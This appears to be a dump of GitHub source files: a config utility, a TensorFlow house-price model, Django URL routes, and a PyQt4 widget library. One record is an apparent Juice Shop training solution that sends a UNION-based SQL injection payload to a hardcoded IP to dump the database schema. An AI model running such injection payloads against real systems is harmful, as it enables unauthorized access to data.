+{"seq_id": "74471010967", "text": "import os\nimport configparser\n\ndef cf_dir(): \n if os.path.isfile('config.ini'): \n cfg = configparser.ConfigParser()\n cfg.read('config.ini')\n return cfg['data']['cf_output_dir']\n else: \n return './counterfactual_examples'\n\nclass IncrementIndex:\n def __init__(self):\n self._cnts = {}\n\n def next(self, key):\n if key not in self._cnts:\n self._cnts[key] = 0\n n = self._cnts[key]\n self._cnts[key] += 1\n return n\n\n", "repo_name": "fhvilshoj/ECINN", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 497, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.isfile", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "22189452822", "text": "from urllib.request import urlopen, Request\r\nfrom urllib.parse import quote\r\nfrom pprint import pprint\r\nfrom json import load\r\n\r\nresponse = urlopen(\r\n Request(\r\n f\"\"\"http://15.236.144.183:8082/rest/products/search?q={quote(\"banana'))UNION SELECT sql,2,3,4,5,6,7,8,9 FROM sqlite_master--\")}\"\"\",\r\n headers={\r\n \"Accept\": \"application/json, text/plain, */*\",\r\n \"Content-Type\": \"application/json\",\r\n \"Origin\": \"http://15.236.144.183:8082\",\r\n \"Referer\": \"http://15.236.144.183:8082/\",\r\n \"Cookie\": (\r\n \"language=en; welcomebanner_status=dismiss;\"\r\n \" continueCode=ZaRwEmgxBPbY2oq9vKejJz6AWLU9\"\r\n \"TLiKZSrMdpDWVQk837ZrnN1OX5y4lLMD; cookieconsent\"\r\n \"_status=dismiss\"\r\n ),\r\n },\r\n )\r\n)\r\npprint(load(response))", "repo_name": "mauricelambert/JuiceShopSolucesAutomation", "sub_path": "7_sql_schema.py", "file_name": "7_sql_schema.py", "file_ext": "py", "file_size_in_byte": 852, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "urllib.request.urlopen", "line_number": 6, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 7, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 8, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 23, "usage_type": "call"}, {"api_name": "json.load", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "23389378515", "text": "import tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n\n\n##Importando Datos\nhouse_df = pd.read_csv(\"Precios_hogares.csv\")\n\n\n\n#VISUALIZACION\nsns.scatterplot(x = 'sqft_living', y = 'price', data = house_df)\n\n\n\n#correlacion\nf, ax = plt.subplots(figsize = (20, 20))\nsns.heatmap(house_df.corr(), annot = True)\n\n\n#Limpieza de datos\nselected_features = ['bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'sqft_above', 'sqft_basement']\n\n\nX = house_df[selected_features]\ny = house_df['price']\n\n\nfrom sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler()\nX_scaled = scaler.fit_transform(X)\n \n\n\n\n#Normalizando output\ny = y.values.reshape(-1,1)\ny_scaled = scaler.fit_transform(y)\n\n\n#Entrenamiento\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_teste, y_train, y_test = train_test_split(X_scaled, y_scaled, test_size= 0.25)\n\n#Definir modelo\nmodel = tf.keras.models.Sequential()\n\nmodel.add(tf.keras.layers.Dense(units=100, activation='relu', input_shape=(7, )))\nmodel.add(tf.keras.layers.Dense(units=100, activation='relu'))\nmodel.add(tf.keras.layers.Dense(units=100, activation='relu'))\nmodel.add(tf.keras.layers.Dense(units=1, activation='linear'))\n\nmodel.summary()\n\nmodel.compile(optimizer= 'Adam', loss= 'mean_squared_error')\n\nepochs_hist = model.fit(X_train, y_train, epochs = 100, batch_size = 50, validation_split = 0.2)\n\n\n#Evaluando Modelo\nepochs_hist.history.keys()\n\n\n\n#Grafico\nplt.plot(epochs_hist.history['loss'])\nplt.plot(epochs_hist.history['val_loss'])\nplt.title('Progreso del Modelo durante Entrenamiento')\nplt.xlabel('Epoch')\nplt.ylabel('Training and Validation Loss')\nplt.legend(['Training Loss', 'Validation Loss'])\n\n\n\n#########PREDICTION!!!!!!!!!!!!\n\"\"\" 'bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'sqft_above', 'sqft_basement' \"\"\"\n\nprint(\"Prediccion del precio de inmuebles\")\nprint(\"\")\n\nbedrooms = int(input(\"Numero de Cuartos: \"))\nbathrooms = int(input(\"Numero de baños: \"))\nfloors = int(input(\"Numero de pisos: \"))\nsqft_living = int(input(\"Area del inmueble (m^2): \")) \nsqft_lot = int(input(\"Area del lote (m^2): \"))\nsqft_above = int(input(\"Area de la terraza (m^2): \"))\nsqft_basement = int(input(\"Area del subterraneo/sotano (m^2): \"))\n\nX_test_1 = np.array([[ bedrooms, bathrooms, sqft_living , sqft_lot, floors, sqft_above, sqft_basement]])\n\n\nscaler_1 = MinMaxScaler()\nX_test_scaled_1 = scaler_1.fit_transform(X_test_1)\n\n#Haciendo prediccion\ny_predict_1 = model.predict(X_test_scaled_1)\ny_predict_1 = scaler.inverse_transform(y_predict_1)\n\n\nprint(\"El precio en dolares del inmueble es de: \", y_predict_1.max())\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "EmilioCudriz/IAs", "sub_path": "IA_lvl1/04IA_BienesRaices.py", "file_name": "04IA_BienesRaices.py", "file_ext": "py", "file_size_in_byte": 2661, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "seaborn.scatterplot", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 22, "usage_type": "call"}, {"api_name": 
"sklearn.preprocessing.MinMaxScaler", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 56, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 94, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 97, "usage_type": "call"}]}
+{"seq_id": "32064978299", "text": "from django.urls import path\nfrom limitedTimeDeal import views\n\nurlpatterns = [\n path('createUser', views.UserProfileApiView.as_view()),\n path('createDeal', views.DealApiView.as_view()),\n path('updateDeal//', views.UpdateDeal.as_view()),\n path('endDeal//', views.EndDeal.as_view()),\n path('claimDeal//', views.ClaimDealApiView.as_view()),\n \n]", "repo_name": "rahuljha009/Udaan", "sub_path": "limitedTimeDeal/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 399, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.UserProfileApiView.as_view", "line_number": 5, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.UserProfileApiView", "line_number": 5, "usage_type": "attribute"}, {"api_name": "limitedTimeDeal.views", "line_number": 5, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.DealApiView.as_view", "line_number": 6, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.DealApiView", "line_number": 6, "usage_type": "attribute"}, {"api_name": "limitedTimeDeal.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.UpdateDeal.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.UpdateDeal", "line_number": 7, "usage_type": "attribute"}, {"api_name": "limitedTimeDeal.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.EndDeal.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.EndDeal", "line_number": 8, "usage_type": "attribute"}, {"api_name": "limitedTimeDeal.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.ClaimDealApiView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.ClaimDealApiView", "line_number": 9, "usage_type": "attribute"}, {"api_name": "limitedTimeDeal.views", "line_number": 9, "usage_type": "name"}]}
+{"seq_id": "32208842104", "text": "import os, sys, traceback, threading\nfrom PyQt4 import QtGui, QtCore, QtWebKit\ntry:\n import json\nexcept:\n import simplejson as json\n\n#++++++++++++++++++++++++++++++++++++++++++++++++++++\n#TODO\n# Add more widgets\n# Add more attribute handling\n# Add more signal handling\n\n#----------------------------------------------------\n\ndef debug(text):\n sys.stderr.write(\"GUI: %s\\n\" % text)\n sys.stderr.flush()\n\n\n# Widget Base Classes - essentially used as 'Mixins' >>>>>>>>>>>>>>>>\nclass WBase:\n def x__tt(self, text):\n \"\"\"Set tooltip.\n \"\"\"\n self.setToolTip(text) #qt\n\n def x__text(self, text=\"\"):\n \"\"\"Set widget text.\n \"\"\"\n self.setText(text) #qt\n\n def enable(self, on):\n \"\"\"Enable/Disable widget. on should be True to enable the widget\n (display it in its normal, active state), False to disable it\n (which will normally be paler and non-interactive).\n \"\"\"\n self.setEnabled(on) #qt\n\n def focus(self):\n self.setFocus() #qt\n\n def x__width(self, w):\n \"\"\"Set the minimum width for the widget.\n \"\"\"\n self.setMinimumWidth(w) #qt\n\n def x__typewriter(self, on):\n \"\"\"Use a typewriter (fixed spacing) font.\n \"\"\"\n if on:\n f = QtGui.QFont(self.font()) #qt\n f.setFamily(\"Courier\") #qt\n self.setFont(f) #qt\n\n\nclass BBase:\n \"\"\"Button mixin.\n \"\"\"\n def x__icon(self, icon):\n self.setIcon(self.style().standardIcon(icondict[icon])) #qt\n\n#qt\nicondict = { \"left\" : QtGui.QStyle.SP_ArrowLeft,\n \"right\" : QtGui.QStyle.SP_ArrowRight,\n \"down\" : QtGui.QStyle.SP_ArrowDown,\n \"up\" : QtGui.QStyle.SP_ArrowUp,\n \"reload\" : QtGui.QStyle.SP_BrowserReload,\n }\n\n\nclass TopLevel:\n def setVisible(self, on=True):\n self.setVisible(on) #qt\n\n def x__size(self, w_h):\n w, h = [int(i) for i in w_h.split(\"_\")]\n self.resize(w, h) #qt\n\n def x__icon(self, iconpath):\n guiapp.qtapp.setWindowIcon(QtGui.QIcon(iconpath)) #qt\n\n def x__title(self, text):\n self.setWindowTitle(text) #qt\n\n def getSize(self):\n s = self.size() #qt\n return \"%d_%d\" % (s.width(), s.height()) #qt\n\n def getScreenSize(self):\n dw = guiapp.qtapp.desktop() #qt\n geom = dw.screenGeometry(self) #qt\n return \"%d_%d\" % (geom.width(), geom.height()) #qt\n\n#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n\nclass Window(QtGui.QWidget, TopLevel): #qt\n \"\"\"This is needed to trap window closing events. 
It also supports\n a 'busy' mechanism.\n \"\"\"\n def __init__(self):\n QtGui.QWidget.__init__(self) #qt\n self.closesignal = \"\"\n self.busystate = False\n self.busy_lock = threading.Lock()\n\n def closeEvent(self, event): #qt\n if self.closesignal:\n guiapp.sendsignal(self.closesignal)\n event.ignore() #qt\n return\n guiapp.send(\"/\", \"1\")\n QtGui.QWidget.closeEvent(self, event) #qt\n\n def x__closesignal(self, text):\n self.closesignal = text\n\n def busy(self, widgets, on, busycursor=True):\n \"\"\"This activates (or deactivates, for on=False) a 'busy' mechanism,\n which can be one or both of the following:\n Make the application's cursor change to the 'busy cursor'.\n Disable a group of widgets.\n There is a lock to prevent the busy state from being set when it\n is already active.\n \"\"\"\n # I couldn't get the following calls to work:\n # w.setCursor(QtCore.Qt.BusyCursor)\n # w.unsetCursor()\n self.busy_lock.acquire()\n if on:\n if self.busystate:\n debug(\"*ERROR* Attempt to set busy state twice\")\n self.busy_lock.release()\n return\n self.busycursor = busycursor\n if busycursor:\n guiapp.qtapp.setOverrideCursor(QtCore.Qt.BusyCursor) #qt\n else:\n if not self.busystate:\n debug(\"*ERROR* Attempt to release busy state twice\")\n self.busy_lock.release()\n return\n if self.busycursor:\n guiapp.qtapp.restoreOverrideCursor() #qt\n self.busystate = on\n self.busy_lock.release()\n for wn in widgets:\n w = guiapp.getwidget(wn)\n if w:\n w.setEnabled(not on) #qt\n else:\n debug(\"*ERROR* No widget '%s'\" % wn)\n\n\nclass Dialog(QtGui.QDialog, TopLevel):\n def __init__(self):\n QtGui.QDialog.__init__(self) #qt\n\n def showmodal(self):\n return self.exec_() == QtGui.QDialog.Accepted #qt\n\n\nclass DialogButtons(QtGui.QDialogButtonBox): #qt\n def __init__(self):\n return\n\n def x__buttons(self, args):\n \"\"\"This keyword argument MUST be present.\n \"\"\"\n buttons = 0\n for a in args:\n try:\n b = getattr(QtGui.QDialogButtonBox, a) #qt\n assert isinstance(b, int) #qt\n buttons |= b #qt\n except:\n gui_warning(\"Unknown Dialog button: %s\" % a)\n QtGui.QDialogButtonBox.__init__(self, buttons) #qt\n\n def x__dialog(self, dname):\n \"\"\"This must be set or else the dialog buttons won't do anything.\n \"\"\"\n self._dialog = guiapp.getwidget(dname)\n self.connect(self, QtCore.SIGNAL(\"clicked(QAbstractButton *)\"), #qt\n self._clicked) #qt\n\n def _clicked(self, button): #qt\n if self.buttonRole(button) == self.AcceptRole: #qt\n self._dialog.accept() #qt\n else:\n self._dialog.reject() #qt\n\n\ndef textLineDialog(label=None, title=None, text=\"\", pw=False):\n if label == None:\n label = \"Enter the value here:\"\n if title == None:\n title = \"Enter Information\"\n if pw:\n echo = QtGui.QLineEdit.Password #qt\n else:\n echo = QtGui.QLineEdit.Normal #qt\n result, ok = QtGui.QInputDialog.getText(None, #qt\n title, label, echo, text) #qt\n return (ok, unicode(result))\n\n\ndef confirmDialog(message, title=None):\n if title == None:\n title = \"Confirmation\"\n return (QtGui.QMessageBox.question(None, title, message, #qt\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.Cancel) == #qt\n QtGui.QMessageBox.Yes) #qt\n\n\ndef infoDialog(message, title=None):\n if title == None:\n title = \"Information\"\n QtGui.QMessageBox.information(None, title, message) #qt\n\n\n#+++++++++++++++++++++++++++\n# Error handling\ndef gui_error(message, title=None):\n if title == None:\n title = \"Error\"\n QtGui.QMessageBox.critical(None, title, message) #qt\n guiapp.qtapp.exit(1) #qt\n\ndef gui_warning(message, 
title=None):\n if title == None:\n title = \"Warning\"\n QtGui.QMessageBox.warning(None, title, message) #qt\n\ndef onexcept(text):\n debug(traceback.format_exc())\n gui_error(text, \"Exception\")\n#---------------------------\n\nfileDialogDir = \"/\"\ndef fileDialog(message, start=None, title=None, dir=False, create=False, filter=None):\n # filter is a list: first a textual description, then acceptable glob filenames\n global fileDialogDir\n if not start:\n start = fileDialogDir\n dlg = QtGui.QFileDialog(None, message, start) #qt\n if title:\n dlg.setWindowTitle(title) #qt\n dlg.setReadOnly(not create) #qt\n if dir:\n dlg.setFileMode(dlg.Directory) #qt\n elif not create:\n dlg.setFileMode(dlg.ExistingFile) #qt\n if filter:\n dlg.setNameFilter(\"%s (%s)\" % (filter[0], \" \".join(filter[1:]))) #qt\n if dlg.exec_():\n path = str(dlg.selectedFiles()[0]).strip()\n if os.path.isdir(path):\n fileDialogDir = path\n elif os.path.isfile(path):\n fileDialogDir = os.path.dirname(path)\n return path\n else:\n return \"\"\n\n\n# See if PyQt4.5 allows me to set the options\n# Also see if I can add home and filesystem to the urls\ndef specialFileDialog(caption, directory, label, urls):\n dlg = QtGui.QFileDialog(None, caption, directory) #qt\n dlg.setFileMode(QtGui.QFileDialog.Directory) #qt\n urlsqt = [ QtCore.QUrl.fromLocalFile(u) for u in urls ] #qt\n dlg.setSidebarUrls(urlsqt) #qt\n dlg.setReadOnly(True)\n #dlg.setOptions(dlg.DontUseNativeDialog | dlg.ShowDirsOnly)\n # | dlg.ReadOnly) #qt\n # add new name line instead of file type\n dlg.setLabelText(dlg.FileType, label)\n\n l = dlg.layout()\n# lbl=QtGui.QLabel(label) #qt\n# l.itemAtPosition (3, 0).widget().hide()\n# l.addWidget(lbl, 3, 0)\n e = QtGui.QLineEdit()\n l.itemAtPosition (3, 1).widget().hide()\n l.addWidget(e, 3, 1)\n if dlg.exec_():\n path = dlg.selectedFiles()[0]\n return((True, str(path).strip(), str(e.text()).strip()))\n else:\n return ((False, None, None))\n\n\nclass Stack(QtGui.QStackedWidget): #qt\n def __init__(self):\n QtGui.QStackedWidget.__init__(self) #qt\n self.x_mywidgets = {}\n\n def x__pages(self, pages):\n for page in pages:\n pw = _Page() #qt\n self.addWidget(pw) #qt\n pw.w_name = page\n self.x_mywidgets[page] = pw\n\n def set(self, index=0):\n self.setCurrentIndex(index) #qt\n\n\nclass Notebook(QtGui.QTabWidget): #qt\n s_default = \"changed\"\n s_signals = {\n \"changed\": \"currentChanged(int)\" #qt\n }\n def __init__(self):\n QtGui.QTabWidget.__init__(self) #qt\n self.x_tabs = []\n self.x_mywidgets = {}\n\n def x__tabs(self, tabs):\n for tab in tabs:\n tname = tab[0]\n tw = _Page() #qt\n self.addTab(tw, (tab[1])) #qt\n tw.w_name = tname\n self.x_mywidgets[tname] = tw\n self.x_tabs.append([tname, tw])\n\n def set(self, index=0):\n self.setCurrentIndex(index) #qt\n\n def enableTab(self, index, on):\n self.setTabEnabled(index, on) #qt\n\nclass _Page(QtGui.QWidget): #qt\n def __init__(self): #qt\n QtGui.QWidget.__init__(self) #qt\n\n\nclass Frame(QtGui.QGroupBox, WBase): #qt\n def __init__(self):\n QtGui.QGroupBox.__init__(self) #qt\n\n def x__text(self, text):\n self.setTitle(text) #qt\n\n\nclass OptionalFrame(Frame): #qt\n s_default = \"toggled\"\n s_signals = {\n \"toggled\": \"toggled(bool)\" #qt\n }\n def __init__(self): #qt\n Frame.__init__(self) #qt\n self.setCheckable(True) #qt\n self.setChecked(False) #qt\n\n def opton(self, on):\n self.setChecked(on) #qt\n\n def enable_hack(self): #qt\n if not self.isChecked(): #qt\n self.setChecked(True) #qt\n self.setChecked(False) #qt\n\n\nclass Label(QtGui.QLabel, WBase): 
#qt\n    def __init__(self):\n        QtGui.QLabel.__init__(self) #qt\n\n    def x__html(self, text):\n        self.setText(text) #qt\n\n    def x__image(self, path):\n        self.setPixmap(QtGui.QPixmap(path)) #qt\n\n    def x__align(self, pos):\n        if pos == \"center\":\n            a = QtCore.Qt.AlignCenter #qt\n        else:\n            a = QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter #qt\n        self.setAlignment(a) #qt\n\n\nclass Button(QtGui.QPushButton, WBase, BBase): #qt\n    s_default = \"clicked\"\n    s_signals = {\n        \"clicked\": \"clicked()\" #qt\n    }\n    def __init__(self):\n        QtGui.QPushButton.__init__(self) #qt\n\n\nclass ToggleButton(QtGui.QPushButton, WBase, BBase): #qt\n    s_default = \"toggled\"\n    s_signals = {\n        \"toggled\": \"toggled(bool)\" #qt\n    }\n    def __init__(self):\n        QtGui.QPushButton.__init__(self) #qt\n        self.setCheckable(True) #qt\n\n    def set(self, on):\n        self.setChecked(on) #qt\n\n\nclass CheckBox(QtGui.QCheckBox, WBase): #qt\n    # A bit of work is needed to get True/False state #qt\n    # instead of 0/1/2 #qt\n    s_default = \"toggled\"\n    s_signals = {\n        \"toggled\": \"stateChanged(int)\" #qt\n    }\n    def __init__(self):\n        QtGui.QCheckBox.__init__(self) #qt\n\n    def set(self, on):\n        self.setCheckState(2 if on else 0) #qt\n\n    def active(self):\n        return self.checkState() != QtCore.Qt.Unchecked #qt\n\n    def s_toggled(self, state): #qt\n        \"\"\"Convert the argument to True/False.\n        \"\"\" #qt\n        return (state != QtCore.Qt.Unchecked,) #qt\n\n\nclass RadioButton(QtGui.QRadioButton, WBase): #qt\n    s_default = \"toggled\"\n    s_signals = {\n        \"toggled\": \"toggled(bool)\" #qt\n    }\n    def __init__(self):\n        # NOTE: fixed from the original, which called QtGui.QPushButton.__init__\n        # here and would raise a TypeError on construction #qt\n        QtGui.QRadioButton.__init__(self) #qt\n\n    def set(self, on):\n        self.setChecked(on) #qt\n\n    def active(self):\n        return self.isChecked() #qt\n\n\nclass ComboBox(QtGui.QComboBox, WBase): #qt\n    s_default = \"changed\"\n    s_signals = {\n        \"changed\": \"currentIndexChanged(int)\" , #qt\n        \"changedstr\": \"currentIndexChanged(const QString &)\" #qt\n    }\n    def __init__(self):\n        QtGui.QComboBox.__init__(self) #qt\n\n    def set(self, items, index=0):\n        self.blockSignals(True)\n        self.clear() #qt\n        if items:\n            self.addItems(items) #qt\n        self.setCurrentIndex(index) #qt\n        self.blockSignals(False)\n\n\nclass ListChoice(QtGui.QListWidget, WBase): #qt\n    s_default = \"changed\"\n    s_signals = {\n        \"changed\": \"currentRowChanged(int)\" , #qt\n    }\n    def __init__(self):\n        QtGui.QListWidget.__init__(self) #qt\n\n    def set(self, items, index=0):\n        self.blockSignals(True)\n        self.clear() #qt\n        if items:\n            self.addItems(items) #qt\n        self.setCurrentRow(index) #qt\n        self.blockSignals(False)\n\n\nclass List(QtGui.QTreeWidget, WBase): #qt\n    # Only using top-level items\n    s_default = \"select\"\n    s_signals = {\n        \"select\": \"itemSelectionChanged()\" , #qt\n        \"clicked\": \"itemClicked(QTreeWidgetItem *,int)\",#qt\n    }\n    def __init__(self):\n        QtGui.QTreeWidget.__init__(self) #qt\n        self.mode = \"\"\n        self.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection) #qt\n        self.setRootIsDecorated(False) #qt\n\n    def x__selectionmode(self, sm):\n        self.mode = sm\n        if sm == \"None\":\n            self.setSelectionMode(QtGui.QAbstractItemView.NoSelection) #qt\n        elif sm == \"Single\":\n            self.setSelectionMode(QtGui.QAbstractItemView.SingleSelection) #qt\n        else:\n            self.mode = \"\"\n            self.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection) #qt\n\n    def setHeaders(self, headers): #qt\n        self.setHeaderLabels(headers) #qt\n\n    def set(self, items, index=0): #qt\n        # Note that each item must be a tuple/list containing\n        # entries for each column.\n        self.clear() #qt\n        c = 0\n        for i in items:\n            item = 
QtGui.QTreeWidgetItem(self, i) #qt\n            self.addTopLevelItem(item) #qt\n            if c == index:\n                self.setCurrentItem(item)\n            c += 1\n\n    def compact(self):\n        for i in range(self.columnCount()): #qt\n            self.resizeColumnToContents(i) #qt\n\n    def s_select(self):\n        # Signal a selection change, passing the new selection list (indexes)\n        s = [self.indexOfTopLevelItem(i) for i in self.selectedItems()] #qt\n        if self.mode == \"Single\":\n            return s\n        else:\n            return (s,)\n\n    def s_clicked(self, item, col): #qt\n        \"\"\"This is intended for activating a user-defined editing function.\n        Tests showed that this is called after the selection is changed, so\n        if using this signal, use it only in 'Single' selection mode and\n        use this, not 'select' to record selection changes. Clicking on the\n        selected row should start editing the cell, otherwise just change\n        the selection.\n        \"\"\"\n        ix = self.indexOfTopLevelItem(item) #qt\n        return (ix, col)\n\n\nclass LineEdit(QtGui.QLineEdit, WBase): #qt\n    s_default = \"changed\"\n    s_signals = {\n        \"enter\": \"returnPressed()\", #qt\n        \"changed\": \"textEdited(const QString &)\" #qt\n    }\n    def __init__(self):\n        QtGui.QLineEdit.__init__(self) #qt\n\n    def get(self):\n        return unicode(self.text()) #qt\n\n    def x__ro(self, ro):\n        self.setReadOnly(ro) #qt\n\n    def x__pw(self, star):\n        self.setEchoMode(QtGui.QLineEdit.Password if star == \"+\" #qt\n                         else QtGui.QLineEdit.NoEcho if star == \"-\" #qt\n                         else QtGui.QLineEdit.Normal) #qt\n\n\nclass CheckList(QtGui.QWidget, WBase): #qt\n    def __init__(self):\n        QtGui.QWidget.__init__(self) #qt\n        self.box = QtGui.QVBoxLayout(self) #qt\n        self.title = None\n        # NOTE: fixed from the original, which referenced the undefined\n        # names 'text' and 'l' here; widgets are added to self.box, and\n        # the optional title label is created lazily in x__title\n        self.widget = QtGui.QListWidget() #qt\n        self.box.addWidget(self.widget) #qt\n\n    def x__title(self, text):\n        if self.title:\n            self.title.setText(text) #qt\n        else:\n            self.title = QtGui.QLabel(text) #qt\n            self.box.insertWidget(0, self.title) #qt\n\n    def checked(self, index):\n        return (self.widget.item(index).checkState() == #qt\n                QtCore.Qt.Checked) #qt\n\n    def set(self, items):\n        self.widget.blockSignals(True) #qt\n        self.widget.clear() #qt\n        if items:\n            for s, c in items:\n                wi = QtGui.QListWidgetItem(s, self.widget) #qt\n                wi.setCheckState(QtCore.Qt.Checked if c #qt\n                                 else QtCore.Qt.Unchecked) #qt\n        self.blockSignals(False) #qt\n\n\nclass TextEdit(QtGui.QTextEdit, WBase): #qt\n    def __init__(self):\n        QtGui.QTextEdit.__init__(self) #qt\n\n    def x__ro(self, ro):\n        self.setReadOnly(ro) #qt\n\n    def append_and_scroll(self, text):\n        self.append(text) #qt\n        self.ensureCursorVisible() #qt\n\n    def get(self):\n        return unicode(self.toPlainText()) #qt\n\n    def undo(self):\n        QtGui.QTextEdit.undo(self) #qt\n\n    def redo(self):\n        QtGui.QTextEdit.redo(self) #qt\n\n    def copy(self):\n        QtGui.QTextEdit.copy(self) #qt\n\n    def cut(self):\n        QtGui.QTextEdit.cut(self) #qt\n\n    def paste(self):\n        QtGui.QTextEdit.paste(self) #qt\n\n\nclass HtmlView(QtWebKit.QWebView, WBase): #qt\n    def __init__(self):\n        QtWebKit.QWebView.__init__(self) #qt\n\n    def x__html(self, content):\n        self.setHtml(content) #qt\n\n    def setUrl(self, url):\n        self.load(QtCore.QUrl(url)) #qt\n\n    def prev(self):\n        self.back() #qt\n\n    def next(self):\n        self.forward() #qt\n\n\nclass SpinBox(QtGui.QDoubleSpinBox, WBase): #qt\n    s_default = \"changed\"\n    s_signals = {\n        \"changed\": \"valueChanged(double)\" #qt\n    }\n    def __init__(self):\n        QtGui.QDoubleSpinBox.__init__(self) #qt\n        self.step = None\n\n    def x__min(self, min):\n        self.setMinimum(min)\n\n    def x__max(self, max):\n        self.setMaximum(max)\n\n    def x__decimals(self, dec):\n        
self.setDecimals(dec)\n if not self.step:\n self.setSingleStep(10**(-dec))\n\n def x__step(self, step):\n self.setSingleStep(step)\n\n def x__value(self, val):\n self.setValue(val)\n\n\nclass ProgressBar(QtGui.QProgressBar, WBase): #qt\n def __init__(self):\n QtGui.QProgressBar.__init__(self) #qt\n\n def set(self, value):\n self.setValue(value) #qt\n\n def x__max(self, max):\n self.setMaximum(max) #qt\n\n\n\n# Layout classes\nclass Layout:\n \"\"\"A mixin base class for all layout widgets.\n \"\"\"\n pass\n\nboxmargin=3\nclass _BOX(Layout):\n def __init__(self, items):\n self.setContentsMargins(boxmargin, boxmargin, boxmargin, boxmargin) #qt\n for wl in items:\n if isinstance(wl, QtGui.QWidget): #qt\n self.addWidget(wl) #qt\n elif isinstance(wl, SPACE): #qt\n if wl.size: #qt\n self.addSpacing(wl.size) #qt\n self.addStretch() #qt\n elif isinstance(wl, Layout): #qt\n self.addLayout(wl) #qt\n else: #qt\n gui_error(\"Invalid Box entry: %s\" % repr(wl))\n\n\nclass VBOX(QtGui.QVBoxLayout, _BOX): #qt\n def __init__(self, *items):\n QtGui.QVBoxLayout.__init__(self) #qt\n _BOX.__init__(self, items) #qt\n\n\nclass HBOX(QtGui.QHBoxLayout, _BOX): #qt\n def __init__(self, *items):\n QtGui.QHBoxLayout.__init__(self) #qt\n _BOX.__init__(self, items) #qt\n\n\nclass GRID(QtGui.QGridLayout, Layout): #qt\n def __init__(self, *rows):\n QtGui.QGridLayout.__init__(self) #qt\n y = -1\n for row in rows:\n if not isinstance(row, 